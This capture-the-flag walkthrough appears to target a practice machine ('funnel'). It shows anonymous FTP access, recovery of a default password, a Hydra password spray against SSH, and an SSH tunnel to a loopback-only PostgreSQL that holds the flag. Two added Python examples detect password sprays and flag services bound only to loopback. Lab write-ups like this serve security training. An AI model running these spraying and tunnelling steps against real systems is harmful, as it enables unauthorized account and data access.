Port scan (replace ip with the target machine's IP address):
sudo nmap -sV ip
Relevant output:
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Let's try to log in via FTP with the default credentials (Username: anonymous, hit enter for the password):
ftp ip
(type anonymous at the Name prompt, then hit enter at the Password prompt)
Success! Let's see what we got:
dir
Output:
229 Entering Extended Passive Mode (|||27324|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Nov 28  2022 mail_backup
226 Directory send OK.
Let's check what's inside the mail_backup directory:
cd mail_backup
ls
Output:
229 Entering Extended Passive Mode (|||18542|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp         58899 Nov 28  2022 password_policy.pdf
-rw-r--r--    1 ftp      ftp           713 Nov 28  2022 welcome_28112022
226 Directory send OK.
Let's download these two files and close the FTP connection:
get password_policy.pdf
get welcome_28112022
exit
First we view the contents of the welcome file:
cat welcome_28112022
Relevant output (email addresses):
Frome: root@funnel.htb
To: optimus@funnel.htb albert@funnel.htb andreas@funnel.htb christine@funnel.htb maria@funnel.htb
Now, the password file. Since cat cannot render a PDF, we open the current directory in the file manager and open the PDF by double-clicking it:
open .
Relevant file information:
For example the default password of “funnel123#!#” must be changed immediately.
Since we now have a couple of email addresses (and therefore likely usernames) plus a default password, we can check whether anyone has left it unchanged. The server also has port 22 (SSH) open, so we will try every username with the password funnel123#!# in a password spraying attack using the tool Hydra.
Let's create a list of usernames first:
cd temp
sudo nano usernames.txt
Paste the usernames, one per line. Then hit ctrl + o and enter to save, and ctrl + x to close the text editor. Check that your file looks like this:
cat usernames.txt
root
optimus
albert
andreas
christine
maria
Then, use Hydra to try all username/password combinations via SSH:
hydra -L usernames.txt -p 'funnel123#!#' ip ssh
Relevant output:
[22][ssh] host: 10.129.228.195 login: christine password: funnel123#!#
We got a working username for the default password! Let's SSH into the machine with these credentials.
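The spray above leaves a distinctive trace in the server's sshd log: one failed login per username from a single source within seconds, then one success. As an added example (not part of the original walkthrough), a small detector over constructed auth.log lines that keys on distinct usernames per source rather than attempts per account, which is what a per-account lockout threshold misses; the source IPs and timestamps are made up:

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in /var/log/auth.log format; IPs and times are made up.
SAMPLE_AUTH_LOG = """\
Nov 28 10:15:01 funnel sshd[2001]: Failed password for root from 10.10.14.5 port 50110 ssh2
Nov 28 10:15:01 funnel sshd[2002]: Failed password for invalid user optimus from 10.10.14.5 port 50112 ssh2
Nov 28 10:15:02 funnel sshd[2003]: Failed password for invalid user albert from 10.10.14.5 port 50114 ssh2
Nov 28 10:15:02 funnel sshd[2004]: Failed password for invalid user andreas from 10.10.14.5 port 50116 ssh2
Nov 28 10:15:03 funnel sshd[2005]: Accepted password for christine from 10.10.14.5 port 50118 ssh2
Nov 28 10:15:03 funnel sshd[2006]: Failed password for invalid user maria from 10.10.14.5 port 50120 ssh2
Nov 28 10:21:15 funnel sshd[2101]: Accepted password for christine from 192.0.2.7 port 40012 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def parse_auth_log(text, year=2022):
    """Return (timestamp, source ip, user, accepted) tuples; syslog has no year."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["ip"], m["user"], m["result"] == "Accepted"))
    return events

def detect_spray(events, min_users=4, window_s=60):
    """Map source ip -> (users that failed, users that later succeeded) for sources
    failing against >= min_users distinct accounts within window_s seconds."""
    by_ip = defaultdict(list)
    for ev in sorted(events):
        by_ip[ev[1]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if not e[3]]
        for i, first in enumerate(fails):
            window = [e for e in fails[i:] if (e[0] - first[0]).total_seconds() <= window_s]
            users = {e[2] for e in window}
            if len(users) >= min_users:
                later_ok = sorted({e[2] for e in evs if e[3] and e[0] >= first[0]})
                alerts[ip] = (sorted(users), later_ok)
                break
    return alerts
```

A successful login listed in the second element of an alert is the account to treat as compromised and rotate first.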
ssh christine@ip
(type yes at the host key prompt, then enter the password funnel123#!#)
Yeah, we got in! Let's see some more info about this account:
id
Relevant output:
uid=1000(christine) gid=1000(christine) groups=1000(christine)
Let's explore this server. With the ss command (socket statistics) we can see which ports are open locally. We add the flags -l (listening sockets only) and -t (TCP sockets only):
ss -tl
Output:
State  Recv-Q Send-Q   Local Address:Port       Peer Address:Port Process
LISTEN 0      4096         127.0.0.1:34313           0.0.0.0:*
LISTEN 0      4096    127.0.0.53%lo:domain          0.0.0.0:*
LISTEN 0      128            0.0.0.0:ssh             0.0.0.0:*
LISTEN 0      4096         127.0.0.1:postgresql      0.0.0.0:*
LISTEN 0      32                   *:ftp                   *:*
LISTEN 0      128               [::]:ssh                [::]:*
The port of interest is the one of the PostgreSQL database. We add the flag -n to the command to show numeric port numbers instead of service names:
ss -tln
Output:
State  Recv-Q Send-Q   Local Address:Port  Peer Address:Port Process
LISTEN 0      4096         127.0.0.1:34313      0.0.0.0:*
LISTEN 0      4096    127.0.0.53%lo:53         0.0.0.0:*
LISTEN 0      128            0.0.0.0:22         0.0.0.0:*
LISTEN 0      4096         127.0.0.1:5432       0.0.0.0:*
LISTEN 0      32                   *:21               *:*
LISTEN 0      128               [::]:22            [::]:*
The port of the PostgreSQL database is 5432. With the command line tool psql, we can interact with it. But running the command:
psql
Outputs:
Command 'psql' not found, but can be installed with:
apt install postgresql-client-common
Please ask your administrator.
Since we don't have admin privileges on this server, we work around this with local port forwarding (an SSH tunnel) instead. Close the SSH connection and reconnect with:
exit
ssh -L 1234:localhost:5432 christine@ip
password: funnel123#!#
We are logged in, just as before. But when we run the following on our local machine:
ss -tlpn
the output shows that SSH has opened a listening socket on our local machine on port 1234; any traffic we send there is forwarded through the tunnel to port 5432 on the server.
LISTEN 0      128          127.0.0.1:1234       0.0.0.0:*    users:(("ssh",pid=1855,fd=5))
LISTEN 0      128              [::1]:1234          [::]:*    users:(("ssh",pid=1855,fd=4))
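The loopback bind of PostgreSQL seen in the ss -tln output above is exactly what the tunnel just bypassed: a 127.0.0.1 bind keeps a service off the network, but not away from anyone who can log in over SSH. As an added example (not part of the original walkthrough), a parser for that ss listing that separates network-reachable ports from loopback-only ones, so an administrator can see which services rely on the bind address alone; the listing is a constructed copy of the one shown above:

```python
# Constructed copy of the ss -tln listing shown above for the target.
SS_TLN_OUTPUT = """\
State  Recv-Q Send-Q   Local Address:Port  Peer Address:Port Process
LISTEN 0      4096         127.0.0.1:34313      0.0.0.0:*
LISTEN 0      4096    127.0.0.53%lo:53         0.0.0.0:*
LISTEN 0      128            0.0.0.0:22         0.0.0.0:*
LISTEN 0      4096         127.0.0.1:5432       0.0.0.0:*
LISTEN 0      32                   *:21               *:*
LISTEN 0      128               [::]:22            [::]:*
"""

def bind_scope(addr):
    """Classify an ss Local Address as loopback, all (wildcard) or interface."""
    addr = addr.split("%")[0].strip("[]")   # drop %iface suffix and IPv6 brackets
    if addr.startswith("127.") or addr == "::1":
        return "loopback"
    if addr in ("0.0.0.0", "*", "::"):
        return "all"
    return "interface"

def parse_listeners(text):
    """Return (address, port, scope) for each LISTEN row of ss -tln output."""
    listeners = []
    for line in text.splitlines()[1:]:          # first line is the header
        cols = line.split()
        if len(cols) < 5 or cols[0] != "LISTEN":
            continue
        addr, _, port = cols[3].rpartition(":")  # rpartition keeps IPv6 colons in addr
        listeners.append((addr, int(port), bind_scope(addr)))
    return listeners

def exposure_report(listeners):
    """Split ports into network-reachable ones and loopback-only ones. The second
    group is still reachable to any SSH user via ssh -L, as shown for 5432."""
    network = sorted({p for _, p, s in listeners if s != "loopback"})
    loopback_only = sorted({p for _, p, s in listeners if s == "loopback"})
    return {"network": network, "loopback_only": loopback_only}
```

Where shell users should not reach the loopback-only services, the sshd_config directives AllowTcpForwarding and PermitOpen control the tunnel, and the services themselves need their own authentication rather than trusting the bind address.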
Now on our local machine, we can run this command to interact with the PostgreSQL service on the target machine.
psql -U christine -h localhost -p 1234
password: funnel123#!#
And it worked!
psql (15.3 (Debian 15.3-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
Let's see the database content:
\l
Outputs:
   Name    |   Owner   | Encoding |  Collate   |   Ctype    | ICU Locale | Locale Provider |    Access privileges
-----------+-----------+----------+------------+------------+------------+-----------------+-------------------------
 christine | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            |
 postgres  | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            |
 secrets   | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            |
 template0 | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | =c/christine           +
           |           |          |            |            |            |                 | christine=CTc/christine
 template1 | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | =c/christine           +
           |           |          |            |            |            |                 | christine=CTc/christine
(5 rows)
What's inside secrets?
q
(closes the pager showing the list; note that \q would quit psql entirely)
\c secrets
Output:
psql (15.3 (Debian 15.3-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
You are now connected to database "secrets" as user "christine".
Let's view the tables:
\dt
Output:
        List of relations
 Schema | Name | Type  |   Owner
--------+------+-------+-----------
 public | flag | table | christine
(1 row)
Let's view the content of flag:
SELECT * FROM flag;
Congrats!